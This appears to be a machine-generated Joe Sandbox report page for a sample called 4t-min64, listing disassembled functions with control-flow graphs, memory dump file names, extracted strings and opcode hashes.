                                                                                                                                                                    control_flow_graph 762 4205e0-420624 call 409690 call 40b230 767 42062a-42075b call 437480 call 437490 call 4010b0 call 405ea0 call 436570 call 4205c0 762->767 768 42083e-420864 call 409ac0 call 405ea0 762->768 788 4207ec-4207f0 767->788 778 420866 call 409cc0 768->778 779 42086b-42086f 768->779 778->779 789 4207f2 788->789 790 4207f4-4207f9 788->790 791 420801-420805 call 401110 789->791 792 420760-42076c 790->792 793 4207ff 790->793 797 42080a-420839 call 4205c0 791->797 795 420770-42077d 792->795 796 42076e-42078f call 4374a0 792->796 793->791 795->791 801 420794-4207e7 call 4205c0 796->801 797->768 801->788
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 54eab309cbbcbc91f1aa1d7f9abd2083cabef43e0bd7cfff89c20f58ca3136d8
                                                                                                                                                                    • Instruction ID: 290ce69f6ad547394df2190a7b0ffa40d42e849bfb47aab1bc2bb3649a810347
                                                                                                                                                                    • Opcode Fuzzy Hash: 54eab309cbbcbc91f1aa1d7f9abd2083cabef43e0bd7cfff89c20f58ca3136d8
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E51C372B01B209CE760DB61E8853DD37B4A74834CF5005EADE4C66B9ADF788AC4CB94
                                                                                                                                                                    Function 00416640 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: cc787364672716e01483424d96f57002e17810921aec0b18d60d0a0cd81e72d8
                                                                                                                                                                    • Instruction ID: 4f6dbd76bdb7f1b5ad7224de7983185db1d084cda7bd2f51bdb9a9fae9244029
                                                                                                                                                                    • Opcode Fuzzy Hash: cc787364672716e01483424d96f57002e17810921aec0b18d60d0a0cd81e72d8
                                                                                                                                                                    • Instruction Fuzzy Hash: 4EF0C47660878486D710EB86E0807AEFB61F7C5794F500026FA8993B99CB7CD495CF84
                                                                                                                                                                    Function 00401BE0 Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 0 401be0-401beb 1 401bf7-401c3d call 409690 call 40b230 0->1 2 401bf2 call 40a790 0->2 7 4020d1-402122 call 409ac0 call 408890 call 405ea0 * 2 1->7 8 401c43-401c94 call 40f740 call 4205c0 call 40f740 1->8 2->1 28 402124 call 409cc0 7->28 29 402129-402136 call 40ab90 7->29 22 401d37-401d3f call 40f740 8->22 23 401c9a-401ca5 8->23 31 401d41 22->31 32 401d43-401d93 call 401650 22->32 26 401ca8-401d31 call 405ea0 call 4108f0 call 4205c0 23->26 26->22 28->29 36 401d9d-401da5 call 40f740 31->36 32->36 44 401d98 call 41f980 32->44 46 401da7 36->46 47 401da9-401deb call 405ea0 call 4108f0 call 4066b0 36->47 44->36 49 401df4-401dfc call 40f740 46->49 64 401ded 47->64 65 401def 47->65 56 401e00-401e42 call 405ea0 call 4108f0 call 4066b0 49->56 57 401dfe 49->57 76 401e44 56->76 77 401e46 56->77 60 401e4b-401e6e call 4202a0 call 401090 57->60 73 401e70 60->73 74 401e72-401ed9 call 405ea0 * 2 call 411650 call 405f70 60->74 64->49 65->49 68 401def call 4017d0 65->68 68->49 78 401ee3-401f97 call 405ea0 call 4108f0 call 405f30 call 405ea0 call 408890 call 41ce20 call 40f740 73->78 74->78 96 401ede call 41f980 74->96 76->60 77->60 80 401e46 call 4019a0 77->80 104 401f99 78->104 105 401f9e-40203f call 405ea0 call 4108f0 call 420040 call 405ea0 call 4108f0 78->105 80->60 96->78 107 40204e-402084 call 4205e0 call 420870 call 41ee80 call 4016f0 104->107 105->107 126 402049 call 4205c0 105->126 125 4020a6-4020c6 call 401500 107->125 128 4020cb-4020cd 125->128 126->107 129 402088-402097 call 4015d0 128->129 130 4020cf 128->130 129->125 133 4020a1 call 401510 129->133 130->7 133->125
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 4t-min.exe$open
                                                                                                                                                                    • API String ID: 0-538968879
                                                                                                                                                                    • Opcode ID: 9e3ba6fc18f9c601456f46438dcf903f9fe708c7d73af095027579e4a22aa9d1
                                                                                                                                                                    • Instruction ID: 048829b1750ea30ec6b9ad19fa6e98bbf4dfb500dd66edc7954380674b943fd3
                                                                                                                                                                    • Opcode Fuzzy Hash: 9e3ba6fc18f9c601456f46438dcf903f9fe708c7d73af095027579e4a22aa9d1
                                                                                                                                                                    • Instruction Fuzzy Hash: B3B11B31701B1088EB60AB32EC5539A33B5B74474CF4041BADE4D677E6DF398A84CB9A
                                                                                                                                                                    Function 100015D0 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21462295127.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21462183036.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462411468.0000000010017000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462514042.0000000010018000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462603508.0000000010019000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462702873.000000001001A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462811966.000000001001B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462902539.0000000010020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_10000000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: WM_CLOAK$WM_UNCLOAK
                                                                                                                                                                    • API String ID: 0-2187480440
                                                                                                                                                                    • Opcode ID: 77afcf97e8796b09d22dd2592e6b4fc19c23d6960b881a137ea3c6ffd614e2e1
                                                                                                                                                                    • Instruction ID: 999cba4f9fcf976bc5d07be9782da9f7193d036dabe909fa0d71f8e84e529c46
                                                                                                                                                                    • Opcode Fuzzy Hash: 77afcf97e8796b09d22dd2592e6b4fc19c23d6960b881a137ea3c6ffd614e2e1
                                                                                                                                                                    • Instruction Fuzzy Hash: A7519D397096508AFB00DBA0D8913DE37B1E7847C8F548125EE4D5B7AEDF38E88083A1
                                                                                                                                                                    Function 004202A0 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Local\4tmin64_ErrStr$Local\4tmin64_Event
                                                                                                                                                                    • API String ID: 0-3739993184
                                                                                                                                                                    • Opcode ID: e3a6706803a1db87bed50e46e47df68a2f70a62d52aab4f4d321d5353f545205
                                                                                                                                                                    • Instruction ID: 03a317ca1de5e8ead3b8f384236de183a8fe24052a5e299b0a5709495301a847
                                                                                                                                                                    • Opcode Fuzzy Hash: e3a6706803a1db87bed50e46e47df68a2f70a62d52aab4f4d321d5353f545205
                                                                                                                                                                    • Instruction Fuzzy Hash: 91310776B01F1085EB00ABAAE89139E37B1F749B8CF44503ADE4D67B99DF79C4448389
                                                                                                                                                                    Function 0041EA20 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: YA
                                                                                                                                                                    • API String ID: 0-3817804567
                                                                                                                                                                    • Opcode ID: 7c37f818e6579aba79f20fe4d263dc83c5e9d3c9e340bcd68e43678b4630cad1
                                                                                                                                                                    • Instruction ID: a6299225e11e20cb6ac6a56ce1bd21100c4ffddc1d6504bf37ad6a58a17c9bfe
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c37f818e6579aba79f20fe4d263dc83c5e9d3c9e340bcd68e43678b4630cad1
                                                                                                                                                                    • Instruction Fuzzy Hash: 5EA11C36B10B1188EB60EB72E8913DD3374A74574CF4000AADE4D67B9ADF398AC5CB95
                                                                                                                                                                    Function 0041ED5C Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: YA
                                                                                                                                                                    • API String ID: 0-3817804567
                                                                                                                                                                    • Opcode ID: 557453676b350d0b97389df703e068f10effedf945b835c60189d1292fd4a5ac
                                                                                                                                                                    • Instruction ID: 1ab5b7e434620d764e599b9e20e58f9a9580112ce594b4d466c3e934fe10f47f
                                                                                                                                                                    • Opcode Fuzzy Hash: 557453676b350d0b97389df703e068f10effedf945b835c60189d1292fd4a5ac
                                                                                                                                                                    • Instruction Fuzzy Hash: DA619936B01B2198EB60EB72D8913DD33B5A74474CF4000AADE4D67B99DF388A85CB95
                                                                                                                                                                    Function 004372A0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 462 4372a0-4372be 463 4372c2 462->463 464 4372c0 462->464 465 437477-43747c 463->465 466 4372c7-4372d2 463->466 464->466 467 4372d4 466->467 468 4372de call 401150 466->468 467->468 470 4372e3-4372f6 468->470 471 4372fa-43732d 470->471 472 4372f8 470->472 473 437336-43733d 471->473 474 437331 call 4370c0 471->474 472->473 475 437340-437355 473->475 474->473 476 437361-437391 call 401190 475->476 477 437357 475->477 480 437393-4373d3 call 4370c0 476->480 481 4373d8-4373ea 476->481 477->476 480->481 482 4373f6-437426 call 401190 481->482 483 4373ec 481->483 488 437428-437468 call 4370c0 482->488 489 43746d-437471 482->489 483->482 488->489 489->465 489->475
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: A
                                                                                                                                                                    • API String ID: 0-773618204
                                                                                                                                                                    • Opcode ID: ed20fd3632b071b46850e4f7b446b20335ad902623509184ea2b2be672880985
                                                                                                                                                                    • Instruction ID: 6726f19d4b5b664fb53e683bf561fc5445b49bb23f58b1119d541ff567eee7bb
                                                                                                                                                                    • Opcode Fuzzy Hash: ed20fd3632b071b46850e4f7b446b20335ad902623509184ea2b2be672880985
                                                                                                                                                                    • Instruction Fuzzy Hash: 45510FA6B08B9489EB24CBA6D4903AD3BB1F348B88F045857DF9D67B59CF38C240C344
                                                                                                                                                                    Function 0043729F Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 492 43729f-4372be 493 4372c2 492->493 494 4372c0 492->494 495 437477-43747c 493->495 496 4372c7-4372d2 493->496 494->496 497 4372d4 496->497 498 4372de call 401150 496->498 497->498 500 4372e3-4372f6 498->500 501 4372fa-43732d 500->501 502 4372f8 500->502 503 437336-43733d 501->503 504 437331 call 4370c0 501->504 502->503 505 437340-437355 503->505 504->503 506 437361-437391 call 401190 505->506 507 437357 505->507 510 437393-4373d3 call 4370c0 506->510 511 4373d8-4373ea 506->511 507->506 510->511 512 4373f6-437426 call 401190 511->512 513 4373ec 511->513 518 437428-437468 call 4370c0 512->518 519 43746d-437471 512->519 513->512 518->519 519->495 519->505
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: A
                                                                                                                                                                    • API String ID: 0-773618204
                                                                                                                                                                    • Opcode ID: 9e017d02212fa924b036f7cfb1a594a3e2debe4d17dd86c5905d90b9890cd7e9
                                                                                                                                                                    • Instruction ID: ce419758dae999302d141915da77fc8b5e9666ea6da0b5dac6d581f141328edd
                                                                                                                                                                    • Opcode Fuzzy Hash: 9e017d02212fa924b036f7cfb1a594a3e2debe4d17dd86c5905d90b9890cd7e9
                                                                                                                                                                    • Instruction Fuzzy Hash: 694100A6B08B9489EB24CBA9D4903AD3FB1F349B88F045856DF9D67B59CF38C144C344
                                                                                                                                                                    Function 10014380 Relevance: .2, Instructions: 229COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 522 10014380-100143b1 523 100143b3-100143f0 call 100015a0 522->523 524 100143b5-100143cb call 100015a0 522->524 529 100143f4-100143f9 523->529 527 100143d0-100143d4 524->527 527->529 531 10014400-1001440b 529->531 532 100143fb 529->532 534 10014412-10014419 call 100147d0 531->534 535 1001440d 531->535 533 100146df-100146fd call 10004f40 532->533 540 10014420-10014432 call 10015540 534->540 541 1001441b 534->541 535->533 544 10014434 540->544 545 10014439-10014451 call 10001490 540->545 541->533 544->533 548 10014453 545->548 549 10014458-1001445e 545->549 548->533 549->533 550 10014464-1001446c 549->550 551 10014472-1001447a 550->551 552 10014509-10014511 550->552 553 100144d2-100144dd call 10014800 551->553 554 1001447c-10014484 551->554 555 10014513 552->555 556 10014515-10014520 call 10014840 552->556 564 100144e1-100144ff call 10014d10 553->564 565 100144df 553->565 554->553 558 10014486-1001448e 554->558 559 10014556 555->559 567 10014522 556->567 568 10014524-1001452f call 10014800 556->568 558->553 562 10014490-10014498 558->562 559->533 562->553 566 1001449a-100144a2 562->566 569 10014504 564->569 565->569 566->553 571 100144a4-100144ac 566->571 567->559 579 10014531 568->579 580 10014533-10014551 call 10014d10 568->580 569->533 573 100144b2-100144ba 571->573 574 1001455b-1001456b 571->574 573->533 578 100144c0-100144c7 573->578 576 1001456d 574->576 577 1001456f-10014576 574->577 582 100145bf-100145dd call 10014d10 576->582 583 10014578 577->583 584 1001457a-100145b2 call 10014c50 577->584 585 100144cd 578->585 586 1001466c-10014675 578->586 579->559 580->559 594 100145e2-100145e9 call 10013c50 582->594 583->582 598 100145b4 584->598 599 100145b6 584->599 585->533 587 10014677 586->587 588 10014679-10014687 call 1000db40 586->588 591 1001468b-1001469f call 10001530 587->591 601 100146b1-100146d8 call 10014c50 588->601 602 10014689 588->602 591->601 608 100146a1-100146ad call 10014910 591->608 606 100145f0-100145fa 594->606 607 100145eb 594->607 604 100145bd 598->604 599->604 609 100146dd 601->609 602->591 604->594 611 100145fc 606->611 612 100145fe-10014608 606->612 610 10014667 607->610 608->601 620 100146af 608->620 609->533 610->533 611->610 614 1001460a 612->614 615 1001460c-10014641 call 10004f40 call 10013520 call 10005750 612->615 614->610 625 10014643 615->625 626 10014645-10014662 call 10001420 615->626 620->609 625->610 626->610
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21462295127.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21462183036.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
